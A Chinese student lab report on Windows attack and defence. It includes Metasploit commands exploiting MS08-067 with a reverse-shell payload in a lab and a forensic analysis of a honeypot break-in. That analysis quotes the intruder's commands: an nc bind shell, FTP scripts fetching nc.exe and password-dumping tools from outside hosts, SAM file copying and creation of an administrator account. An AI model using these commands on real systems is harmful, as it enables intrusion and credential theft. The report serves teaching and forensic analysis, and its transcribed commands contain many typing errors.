20212908 2021-2022-2 《网络攻防实践》实践六报告
一、实践内容
1.Windows远程攻击技术分类
(1)远程口令猜测与破解攻击
(2)攻击Windows网络服务
(3)攻击Windows客户端及用户
2.Windows系统的安全漏洞生命周期
(1)Windows安全漏洞发现、利用与修补过程
(2)安全漏洞公开披露信息库
(3)针对特定目标的渗透测试攻击过程:①漏洞扫描测试;②查找针对发现漏洞的渗透代码;③实施渗透测试
(4)使用Metasploit软件实施渗透测试
3.Windows远程口令猜测与破解攻击
(1)远程口令自猜测
(2)远程口令字交换通信窃听与破解
(3)远程口令猜测与破解防范措施
4.Windows网络服务远程渗透攻击
(1)针对NetBIOS网络服务的著名漏洞及攻击
(2)针对SMB网络服务的著名漏洞及攻击
(3)针对MSRPC网络服务的著名漏洞及攻击
(4)针对Windows系统上微软网络服务的远程渗透攻击
(5)针对Windows系统上第三方网络服务的远程渗透攻击
5.Windows本地安全攻防技术
(1)Windows敏感信息窃取
(2)Windows系统口令字密文提取技术
(3)Windows系统口令字破解技术
(4)用户敏感数据窃取
6.Windows消踪灭迹
(1)关闭审计功能
(2)清理事件日志
- 本次实验的渗透工具:Metasploit,Metasploit是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。Metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。
二、实践过程
1.动手实践Metasploit windows attacker
- 任务:使用metasploit软件进行windows远程渗透统计实验
- 具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(1)打开kali终端,进入启动msfconsole
(2)search ms08_067
查看漏洞ms08_067详细信息
(3)use windows/smb/ms08_067_netapi
进入漏洞所在文件
(4)show options
查看攻击此漏洞需要的设置
(5)show payloads
显示此漏洞的载荷,选择第三个载荷进行攻击
(6)打开wireshark进行抓包
set payload generic/shell_reverse_tcp
设置载荷
set RHOST 192.168.200.124
设置攻击主机win2k
set LHOST 192.168.200.5
设置本机
exploit
进行攻击
(7)ipconfig/all
观察到询问192.168.200.124MAC地址的arp数据包,表示攻击开始
查看其他wireshark抓到的数据包,可以看到攻击利用的漏洞有针对SMB网络服务的漏洞、DCERPC解析器拒绝服务漏洞、SPOOLSS打印服务假冒漏洞
查看tcp数据流观察到ipconfig/all的命令
2.取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
使用wireshark打开snort-0204@0117.log,大致浏览文件后,可以发现日志文件由以下内容组成:
- 可识别的HTTP协议内容
- 可识别的SQL语言代码内容
- 可识别的系统操作代码内容
- 不可识别的数据(二进制数据)
(1)攻击者使用了什么破解工具进行攻击
答:攻击者利用了Unicode攻击(针对MS00-078/MS01-026)和针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
分析:追踪HTTP数据流,可以找到特殊字符%C0%AF,在Unicode编码中对应符号/,因此可以推测存在UNICODE编码漏洞攻击,说明攻击者通过IIS Unicode漏洞了解了被攻击主机操作系统的一些基本情况:
再往下,可以看到攻击者试图向服务器获取一个msadcs.dll文件:
攻击者利用这个dll存在RDS漏洞,输入了个数据查询语句进行SQL注入攻击。根据“ADM!ROX!YOUR!WORLD”特征字符串,以及查询语句中使用了dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb,通过查询可以知道到它是由rain forest puppy 编写的 msadc(2).pl渗透攻击代码发起的。
至此,攻击者通过查点确认了目标系统提供 Web 服务的是IIS v4.0,并存在Unicode和RDS安全漏洞,可进行进一步渗透攻击。
(2)攻击者如何使用这个破解工具进入并控制了系统
观察到每次RDS渗透攻击间的间隔时间均为6秒左右,可以推测攻击者是预先写好需执行的shell指令列表,然后由 msadc(2).pl 渗透攻击工具一起执行。
可以发现攻击者并没有成功,之后便又开始转向 Unicode 攻击,每条请求间隔时间大概在 10-12 秒,意味着指令可能是由攻击者手工输入的,如图:
蜜罐主机连接 213.116.251.162 并下载了所指定的这些文件,并通过 nc构建其一个远程 shell 通道。cmd1.exe /c nc -l -p 6969 -e cmd1.exe接着,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
(3)攻击者获得系统访问权限后做了什么(4238-5537)
整理shell代码
shell ("cmd /c echo werd >> c: fu n);
shell("cmd /c echo user johna2k > ftpcom")
shell("cmd /c echo hacker 2000 >> ftpcom")
shell("cmd /c echo get pump.exe >> ftpcom"
shell ("cmd /c echo get nc.exe>>{tpcom");
shell ("cmd /c echo quit>>ftpcom")
shell("cmd /c ftp - s : ftpcom- n www.nether.net");
shell ("cmd /c pdump .exe>>new.pass" )
shell ("cmd /c echo userjohna2k > ftpcom2)
shell ("md /c echo hacker2000>>ftpcom2)
shell("cmd /c put new . pass>>ftpcom2)
shell("cmd /c echo quit>>ftpcom2)
shell("cmd /c ftp -S : ftpcom2 - n www.nether.net");
shell("cmd /c ftp 213.116.251.162)
shell ("cmd /c echo open 213.116.251.162 > ftpcom " );
shell ("cmd /c echo johna2k > ftpcom")
shell ("cmd /c echo hacker2000>>ftpcom)
shell ("cmd /c echo get samdump.dIl>>ftpcom")
shell("cmd /c echo get pdump.exe>>ftpcom")
shell ("cmd /c echo get nc.exe>>itpcom)
shell("cmd /c echo quit>>ftpcom")
第一、二段中使用ftpcom可知攻击机打开IP213.116.251.162,使用ftp的方式下载文件,pdump.exe和samdump.dll是配合使用破解口令的,samdump.dll拿到口令pdump.exe破解,SAM文件通过安全表示进行账号安全管理文件。注:本地特权提升采用dll注入或破解程序漏洞得到。
shell ( "cmd /c open 212.139.12.26)
shell("cmd /c echo iohna2k>>sasfile)
shell ("cmd /c echo haxedj00>>sasfile)
shell("cmd /c echo get pdump.exe>>sasfile)
shell("cmd /c echo get samdump.dIl>>sasfile)
shell ( "cmd /c echo get nc.exe>>sasfile)
shell ("cmd /c echo quit>>sasfile)
shell ("cmd /c ftp - s : sasfile ")
shell ( "cmd /c open 213.116.251.162 ")
shell ("cmd /c echo johna2k>>sasfile)
shell("cmd /c echo haxedi00>>sasfile)
shell ( "cmd /c echo get pdump.exe>>sasfile)
shell ( "cmd /c echo get samdump.dil>>sasfile)
shell ("cmd /c echo get nc.exe>>sasfile)
shell("cmd /c echo quit>>sasfile)
第二段和第三段中sasfile为高效读入数据的方式,因此为IP分别为212.139.12.26和213.116.251.162号入了文件,值得注意的是nc.exe文件是一个远程入侵的后门程序,便于下次攻击;
再继续分析msadcs.dll的shell命令,整理如下:
#注意关键字ProgramFiles
shell (" cmd / c C: ProgramFiles CommonFiles system msadc pump.exe > > yay.txt)
shell (" cmd / c C: ProgramFiles CommonFiles system made pdump.ex > > yay.txt " )
#创建会话写入文件yay.txt
shell ("cmd/ c pdump.exe >> c: yay.txt)
shell ("cmd / c net session > > yay2.txt ")
shell("cmd / c net session > > yay2.txt ")
shell("cmd /c net users > > heh.txt")
shell("cmd /c net users >> c: heh.txt ")
#创建用户组提升自己的访问权限
shell ("/ c net localgroup Domain Admin I WAM_ KENNY / ADD " )
shell (" / c net user testuser UgotHacked / A D D")
shell ( "/ c net localgroup Administrators testuser / A D D" )
从上边的shell命令可以看到攻击机进入靶机之后查看了一些系统文件,注意关键字ProgramFiles;然后创建会话写入文件yay.txt,注意到前面有pdump.exe,这是
上一步中提到的口令破解文件,因此猜测创建的会话将破解的口令写入文件yay.txt中;
再继续分析msadcs.dll的sthell命令,整理如下:
shell("cmd/crdisk-/s")
shell("cmd / crdisk -s)
shell("cmd / crdisk")
shell("cmd/crdisk-/s")
shell("cmd / crdisk - s")
shell("cmd / crdisk / S -")
shell("cmd / crdisk/s-")
shell ("cmd / crdisk/s")
#试图朋除和拷贝SAM中的数据(删除和拷贝har.txt)
shell("cmd / c typec: winnt repair sam.> > C: har.txt )
shell("cmd / c delc : inetpub wwwroot har.txt")
shell ("cmd/ c delc: inetpub wwwroot har.txt)
接下来是要创建了用户组等提升攻击机的访问权限;然后利用磁盛修复工具包中的rdisk工具创建SAM文件副本(SAM文件中可是安全账号管理哦!)可以发现创建的口令来来回回执行了好几次,猜测这个攻击者这步操作不是很顺利?!毕竟是SAM文件!然后是尝试删除和拷贝SAM文件中的数据即删除和拷贝har.txt文件;
(4)我们如何防止这样的攻击
这个攻击事件中被利用的两个漏洞为RDS和Unicode漏洞,两者都已经有相应的补丁,通过打补丁可防止遭受同样的攻击。不要使用 IIS4.x 这样臭名昭著的 Web Server,如果必须使用 IIS4.x,主要的防范措施有:
- 为这些漏洞打上补丁;
- 禁用用不着的 RDS 等服务,防火墙封禁网络内部服务器发起的连接;
- 为 web server 在单独的文件卷上设置虚拟根目录;
- 使用 NTFS 文件系统,因为 FAT 几乎不提供安全功能;
- 使用 IIS Lockdown 和 URLScan 等工具加强 web server。
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
攻击者意识到了攻击目标是蜜罐主机,因为他建立了一个文件,并输入了如下内容 _echo best honeypot i've seen till now _) _ rfp.txt
因为该目标主机作为 rfp 的个人网站, Web 服务所使用的 IIS 甚至没有更新 rfp 自己所发现的 MDAC RDS安全漏洞,很容易让攻击者意识到这绝对是台诱饵。
3.团队对抗实践:windows系统远程渗透攻击和分析。
- 攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
- 防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
本地攻击机ip地址 | 本地靶机ip地址 | 对方攻击机ip地址 | 对方靶机ip地址 |
---|---|---|---|
172.20.10.9 | 172.20.10.5 | 172.20.10.7 |
(1)防守实践
首先攻击机与本地靶机的445端口建立连接
之后是一些SMB协议数据包:
最后当对方取得控制权后,通过追踪流后面的TCP数据包可以看到对方在本地靶机上先是查看了IP,然后创建了一个文件夹,之后便结束了本次攻击:
(2)攻击实践
本次使用的攻击机为Kali(IP:172.20.10.9),靶机为Win2KServer(IP:172.20.10.8),且配置在了同一个网段下,连通性测试:
按照1的步骤输入命令对靶机进行攻击
靶机里查看到创建的文件夹:
三、学习中遇到的问题及解决
- 问题1:设置靶机win2k为桥接模式,IP地址不变还是192.168.200.124,导致实验3无法继续
- 问题1解决方案:到Internet协议TCP/IP属性,设置为自动获取ip地址
四、实践总结
本次实验,进行了Windows操作系统安全攻防实践,动手实践Metasploit windows attacker,对解码一次成功的NT系统破解攻击进行了取证分析实践,最后进行了团队对抗实践,对windows系统远程渗透攻击和分析。通过进行实操,加深了自己对于windows系统安全的理解,提高了自己的动手能力。